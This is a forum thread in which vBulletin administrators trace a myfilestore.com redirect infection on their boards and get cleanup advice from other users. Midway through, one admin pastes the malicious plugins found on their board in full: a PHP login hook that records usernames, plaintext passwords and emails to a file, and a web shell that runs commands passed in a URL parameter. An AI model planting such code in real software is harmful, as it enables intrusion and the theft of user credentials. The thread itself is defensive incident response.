Myfilestore.com Virus
 

Hello i have problem with my www.Madenciyim.com

Visitors coming from google search is redirecting to www.myfilestore.com. When they go back to google and come back again going to my website.

What can i do.

I deleted VBSEO plug in. I upgraded my vbulletin on friday but it is still happening.

Check through your plugins for any new ones that may of been added, I've seen them on the global_complete hook location in the past for myfilestore.

i contact with vb support and they offered me to delete "ech" files from plugin management. i hope problem is solved.

Good morning,

Over the weekend, I'm having reports of this exact same virus on my forums as well. Please help! (Should I have made my own thread for this?)

Thanks!!

Posting in this thread is fine, since it refers to the same issue that is the thread topic.

Did you try the suggestion in post #3?

I'm struggling to find the location of the 'ech' files. Could you direct me to the plugin folder in a typical VB4 installation?

Thanks!

I suspect that what you want to do is go to the "Plugin Manager" in your AdminCP and look for the suspect plugins there. :)

The problem is that I inherited these forums from someone else -- I don't have a clear sense of which plugins should and shouldn't be in there, nor do I see timestamps on them to be able to pick one out of the lineup because it's recently installed. Certainly I haven't taken any actions to recently install a plugin; the only thing I've done is uninstall forumrunner (and delete its folder on the server).

I'm just going to paste the lot and hope someone has insight into one-of-these-things-is-not-like-the-others:

Plugin System
Title Hook Location Active Controls
Product : vBulletin
Federal ajax_complete [Edit] [Delete]
Federal ajax_complete [Edit] [Delete]
global_rewrite global_start [Edit] [Delete]
login_rewrite login_process [Edit] [Delete]
Product : Censor Replacements
censor_replacing_script bbcode_parse_start [Edit] [Delete]
Product : GlowHost - Spam-O-Matic
Affiliate link placement parse_templates [Edit] [Delete]
Form actions inlinemod_action_switch [Edit] [Delete]
GlowHost - Spam-O-Matic: Activation Post-Fix register_activate_process [Edit] [Delete]
GlowHost - Spam-O-Matic: AKISMET SPAM filter newpost_process [Edit] [Delete]
GlowHost - Spam-O-Matic: Finish Registration register_addmember_complete [Edit] [Delete]
GlowHost - Spam-O-Matic: First Post/Thread Control threadfpdata_presave [Edit] [Delete]
GlowHost - Spam-O-Matic: Modify User Quick Links Menu useradmin_edit_start [Edit] [Delete]
GlowHost - Spam-O-Matic: Registration Pre-Check register_addmember_process [Edit] [Delete]
GlowHost - Spam-O-Matic: Replies Control postdata_presave [Edit] [Delete]
Menu item in Moderation Tools showthread_start [Edit] [Delete]
Stats render forumhome_complete [Edit] [Delete]
Product : HS - External Signature Image Size Limiter
HS - External Signature Image Size Limiter profile_updatesignature_start [Edit] [Delete]
Product : PostRelease
Cache cache_templates [Edit] [Delete]
Template Page misc_start [Edit] [Delete]
Thread List Page forumdisplay_complete [Edit] [Delete]
Product : Skimlinks Plugin
Add Skimlinks Classes to PostBit postbit_display_complete [Edit] [Delete]
Add Skimlinks JavaScript to footer template showthread_complete [Edit] [Delete]
Add Skimlinks Option to Edit Options Form profile_editoptions_start [Edit] [Delete]
Extend User DataManager userdata_start [Edit] [Delete]
Update Skimlinks Preference profile_updateoptions [Edit] [Delete]
Product : Stop the Registration Bots
Add Member: Check form submit time, hash, and random hidden field. register_addmember_process [Edit] [Delete]
Reg Check Date: Check for hash and random hidden field passed. Second Step register_checkdate [Edit] [Delete]
Register Start: Load Functions. First Step. register_start [Edit] [Delete]
Product : Yet Another Award System 4.0
Awards WOL process online_location_process [Edit] [Delete]
Awards WOL unknown online_location_unknown [Edit] [Delete]
CSS - Inject CSS into vBulletin css_start [Edit] [Delete]
YAAS - Add Tab to Navbar process_templates_complete [Edit] [Delete]
YAAS - Cache Templates cache_templates [Edit] [Delete]
YAAS - Give Award to User Nav mod_index_navigation [Edit] [Delete]
YAAS - Member List Display memberlist_bit [Edit] [Delete]
YAAS - Tab set user member_start [Edit] [Delete]
YAAS in Member Profile - Init init_startup [Edit] [Delete]
YAAS in Member Profile - Profile member_build_blocks_start [Edit] [Delete]
YAAS in Posbit postbit_display_complete [Edit] [Delete]
YAAS Template Group template_groups [Edit] [Delete]
Save Active Status

Thanks again for your help!

I would focus on these:

Product : vBulletin
Federal ajax_complete [Edit] [Delete]
Federal ajax_complete [Edit] [Delete]
global_rewrite global_start [Edit] [Delete]
login_rewrite login_process [Edit] [Delete]

Particularly the last two. Try disabling those two and see what happens.

Thanks, I have done so!

Does that fix the issue? Out of curiosity, would you post the code within those two plugins?

You can also try the following in order to track where it's coming from or how it happened:
- Check the logs at AdminCP > Statistics & Logs > Control Panel Log > look for entries that come from unfamiliar IP addresses.
- Disable all plugins and hooks. (guide) Problem still exists after all plugins/hooks disabled? Then it's possible that certain PHP/JS files are modified on your server.

MarkFL: I can't tell if it's fixed or not. When I go to privateerpressforums.com from a google link (the originally-reported way that this issue manifested), I don't get redirected to this spam website, so... hopefully it's fixed? I was never able to reproduce the issue in the first place, though. Lots of forum users were very vocal about it over the weekend.

Here are the codes:

global_rewrite:

$show['nopasswordempty'] = TRUE;

login_rewrite:

$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./customavatars/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");

while($row = @mysql_fetch_array($sql_query))
{

if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ':' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}

The Federal plugins are still on. Here are their codes:

if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}

and

if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}

In other words, they're identical. Not sure why there are two of them. In general they seem a bit suspicious to me.

Dave: I don't see any suspicious log entries from the past few weeks (though it's unclear to me exactly when this issue started). The IPs are all me and known moderators.

Yeah, those "Federal" plugins look suspicious to me as well. That first one looks like it could be harvesting passwords/email addresses. If it were me, I would look on the server and see what's in the file "/customavatars/lg.html" and if it contains passwords and email addresses, I would download it (in case it is legit and needs to be restored) and delete it.

I would disable or even delete those 4 plugins (make backups in a text file on your hard drive in case you need them back).

Edit: if the file "/customavatars/lg.html" does appear to have passwords/email addresses, I would advise your users to change their passwords.

I also could not solve my problem. As vbulletinsupport told me i deleted all plugins, and also i deleted ech files and i only have VSa - Advanced Forum Statistics on my website and it is the latest version. İ have to delete it?

Can you post exactly what you were told to do?

Hi MarkFL,

Indeed it was harvesting passwords. How awful. I will be backing up and deleting all four plugins.

Any idea how these got on our boards in the first place? I am going to be updating from 4.2.0 to 4.2.3 ASAP, but wanted to try to fix this issue before I did...

I would suspect an SQL exploit, and updating to vB 4.2.3 PL2 would be a good idea. :)

Definitely upgrade to the latest version as soon as possible.
It's entirely possible that they modified vBulletin's PHP files as well.

Will the upgrade to 4.2.3 overwrite these possibly-modified PHP files? Other than any possible compromises to security, the other thing I'm interested in is the extensive set of permissions-locked boards that we use -- not everything visible by everyone. As long as those permissions are preserved, I should be good, but if preserving them could allow a hack to persist, maybe not so good...

Yes, the upgrade will overwrite the default vB PHP files, and your permissions should be preserved and shouldn't be involved in any exploit.

Thanks again.

Assuming nothing goes awry, how long should a typical update take to complete?

It depends on the size of your board, but it shouldn't take more than an hour, including making your backups. :)

If I recall correctly this infection, is VERY sneaky because it hides itself if your computer has followed the redirection. I THINK it will only show itself to your computer once per day. If you've seen it and done something that you THINK fixed it, following the infected link a second time will LOOK like it's fixed - because it won't redirect a second time. And tomorrow you might see it again - ONCE.

A full scan of Malwarebytes on your own computer is also a smart thing to consider. https://www.malwarebytes.com/
There is lots of different malware out there that steals your locally saved FTP logins.

One main question I have is:

- After you deleted all plugins, did you replace all your files with fresh files?

Let's say you're running vBulletin 4.2.2 - You will need to download a 100% fresh and new copy of the 4.2.2.zip from https://members.vbulletin.com and ensure you overwrite all files with the new files (to ensure any old hacked files are now replaced AND clean).

Note to everyone else: If you want to upgrade to 4.2.3 after fixing 4.2.2 then that is okay, but always be aware that you should replace all the files, with the SAME EXACT version files from a fresh .zip you download from vBulletin.com and FIX the site first THEN you can upgrade if you wish - DO NOT ASSUME that upgrading will simply fix your hacked site, in super duper rare occasions IF it was a simple file edit then it will but 99% of the time it's not that simple.

d

Yes first i deleted plugins and then i upgraded to latest version. But it did not solve the problem.

Hey guys,

Yeah, google thinks we're still hacked, probably with the original issue (the occasional browser redirect; that password-logging plugin hasn't reinstalled itself yet, at least). I've been following google's advice, but curl is no help. Inspecting the front page, there are a few javascript codes I don't recognize. One might be google analytics? The others, I'm not sure.

For your consideration:

<script async="" src="https://www.google-analytics.com/analytics.js"></script>
<script type="text/javascript">
<!--
if (typeof YAHOO === 'undefined') // Load ALL YUI Local
{
document.write('<script type="text/javascript" src="clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js?v=420"><\/script>');
document.write('<script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=420"><\/script>');
var yuipath = 'clientscript/yui';
var yuicombopath = '';
var remoteyui = false;
}
else // Load Rest of YUI remotely (where possible)
{
var yuipath = 'clientscript/yui';
var yuicombopath = '';
var remoteyui = true;
if (!yuicombopath)
{
document.write('<script type="text/javascript" src="clientscript/yui/connection/connection-min.js"><\/script>');
}
}
var SESSIONURL = "";
var SECURITYTOKEN = "guest";
var IMGDIR_MISC = "images/misc";
var IMGDIR_BUTTON = "images/buttons";
var vb_disable_ajax = parseInt("0", 10);
var SIMPLEVERSION = "420";
var BBURL = "http://privateerpressforums.com";
var LOGGEDIN = 0 > 0 ? true : false;
var THIS_SCRIPT = "index";
var RELPATH = "forum.php";
var PATHS = {
forum : "",
cms : "",
blog : ""
};
var AJAXBASEURL = "http://privateerpressforums.com/";
// -->
</script>

<script type="text/javascript" src="clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js?v=420"></script>
<style>@media print {#ghostery-purple-box {display:none !important}}</style>
<script type="text/javascript" src="clientscript/yui/connection/connection-min.js?v=420"></script>
<script type="text/javascript" src="http://privateerpressforums.com/clientscript/vbulletin-core.js?v=420"></script>
<link rel="stylesheet" type="text/css" href="clientscript/vbulletin_css/style00009l/main-rollup.css?d=1479505047">

---

Since some of those plugins were hung on 'ajax', this seems promising. Any idea what 'Yui' is?

Thanks!

--------------- Added [DATE]1480440255[/DATE] at [TIME]1480440255[/TIME] ---------------

Also, per Superman's comment: I would very much like to download and rewrite my installation with a fresh copy my current version (4.2.0, patch 3) before upgrading to 4.2.3, but problematically, only 4.2.0 patch 4 is available for download off the official site. Any suggestions?

Thanks!

yui is Yahoo User Interface if I recall correctly. You can overwrite it with the higher patch version just fine, patches simply overwrite files that had a bug or exploit and I believe never requires additional installation.

Not sure why you would bother, but just use the Patch 4 files.

You would be better off just uploading the 4.2.3 files and upgrading.

Per the advice in this thread, I'm going to be deleting all plugins, fixing 4.2.0 and upgrading to 4.2.3 this morning; I am under the impression that a very likely culprit here is Yet Another Awards System, a plugin which, when I googled it, came back heavily associated with "SQL Injection."

It's a bit of a shame, though -- apparently we've used YAAS for many years to give badges and whatnot to members of the community. This is a shot in the dark, but does anyone know if those vulnerabilities have been patched by 4.2.3? Is there a good way to similarly overwrite the plugin's files without losing our data on who has what award and so forth?

Official patches will not not do anything for vulnerabilities in addons. as they are their own code.

Only the product developer could fix them.

Hi folks,

My upgrade from 4.2.0 to 4.2.3 seems to have stalled out at the very first step:

Upgrading to 4.2.3
Status: Processing 4.2.1 Alpha 1, Step 1 of 6

The "upgrade progress" window is completely blank. It's been this way for about twenty minutes. I know that the whole process may take an hour, or hours, but the lack of any visible progress has me a little spooked. Should I be concerned that it's run out of memory or something? (It advised me before I started that there was a way I could do this from the command line if necessary, but not knowing whether or not it would be necessary, I elected to let the script try to process through the browser control panel as normal). Is there a way to cancel out, then retry from the command line?

Thanks!

Check the error logs of your web-server or PHP in order to figure out what is causing it to stop.
Cause could vary; out of memory, webhost blocking you automatically because of too many connections to the server, SQL error, etc.

You can just restart the upgrade and it will continue where it left off. yoursite.com/install/upgrade.php

Here, I'll save you a whole messload of trouble- login to your server.

Go to your MySql Database (the one for your vBulletin install).

Click on search. Type %base64%
click on SELECT ALL

hit "Go".

You will find a large number of base64 codes hidden, most likely within [img] tags from filestore. Remove those. If you have plugins that are using base64- you'd better run a decode and see precisely what they're using it for.

Attachment 155535

If you look through your files and see picture_inline.php that file is Shell Script installed and is infecting your server/site. ( Picture_inlinemod.php IS legit)

Getting those redirects from a google search to the forum where I help admin, is there an absolute fix for this issue? We have vbulletin 4.2.5.

You can reference these for possible fixes:
https://www.vbulletin.com/forum/foru...lestore72-info

https://clients.urljet.com/knowledge...e123-Hack.html

https://clients.urljet.com/knowledge...version-2.html

With filestore they can insert it many different ways, be sure to check for template edits and also rogue plugins (OR malicious code added at the bottom of a plugin). I've even seen some take the site into debug mode and add the infection to the Master Style before let's hope they didn't do that to you i.e. possibly some script-kiddie using a tutorial and hasn't a clue about things of this nature other than how to read top-to-bottom and clickity-click-click (lol).